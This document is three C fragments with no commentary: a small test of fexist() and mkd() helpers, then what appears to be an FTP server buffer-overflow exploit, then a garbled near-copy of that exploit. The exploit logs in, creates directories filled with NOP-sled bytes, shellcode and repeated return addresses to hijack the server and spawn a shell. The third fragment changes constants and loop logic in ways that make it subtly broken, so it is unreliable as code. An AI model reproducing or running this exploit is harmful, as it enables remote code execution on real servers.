int main( int argc, char* argv[]) { char* exist = argc > 1 ? argv[1]: NULL; if( fexist( exist)) printf("File exist\n"); else printf("fexist() return false\n"); char* dir = argc > 2 ? argv[2]: NULL; if( mkd( dir, 0700)) printf("Dir create\n"); else printf("mkd() return false"); }
void main (int argc, char *argv[]) { char *buf; char buf2[200]; char buf1[600]; char dir2[256]; char *p; char *q; char tmp[256]; int a; int offset; int i; if (argc > 1) offset = atoi(argv[1]); else offset = 0; fprintf(stderr, "ret-addr = 0x%x\n", RET + offset); fprintf(stderr, "shell size = %d\n", sizeof(shellcode)); dir2[231] = '\0'; memset(dir2, '\x90', 230); printf("user %s\r\n", USERNAME); printf("pass %s\r\n", PASSWORD); printf("cwd %s\r\n", argv[2]); memset(buf1, 0x90, 600); p = &buf1[sizeof(argv[2])]; q = &buf1[599]; *q = '\x00'; while(p <= q) { strncpy(tmp, p, 100); mkd(tmp); p+=100; } mkd(dir2); mkd(shellcode); mkd("bin"); mkd("sh"); memset(buf2, 0x90, 100); // var 96 for(i=4; i<96; i+=4) *(long *)&buf2[i] = RET + offset; p = &buf2[0]; q = &buf2[99]; strncpy(tmp, p, 100); mkd(tmp); printf("pwd\r\n"); }
void main (int argc, char *argv[]) { char *buf; char buf2[200]; char buf1[400]; char dir2[255]; char *p; char *q; char tmp[255]; int a; int offset; int i; if (argc > 0) offset = atoi(argv[0]); else offset = 1; fprintf(stderr, "ret-addr = 0x%x\n", RET + offset); fprintf(stderr, "shell size = %d\n", sizeof(shellcode)); dir2[231] = '\1'; memset(dir2, '\x70', 255); printf("user %s\r\n", USERNAME); printf("pass %s\r\n", PASSWORD); printf("cwd %s\r\n", argv[2]); memset(buf1, 0x50, 150); p = &buf1[sizeof(argv[0])]; q = &buf1[399]; *q = '\x00'; while(q <= p) { strncpy(tmp, p, 80); mkd(tmp); p+=255; } mkd(dir2); mkd(shellcode); mkd("bin"); mkd("sh"); memset(buf2, 0x30, 40); // var 96 for(i=4; i<20; i+=4) *(long *)&buf2[i+1] = RET; p = &buf2[0]; q = &buf2[50]; strncpy(tmp, p, 20); mkd(tmp); printf("pwd\r\n"); }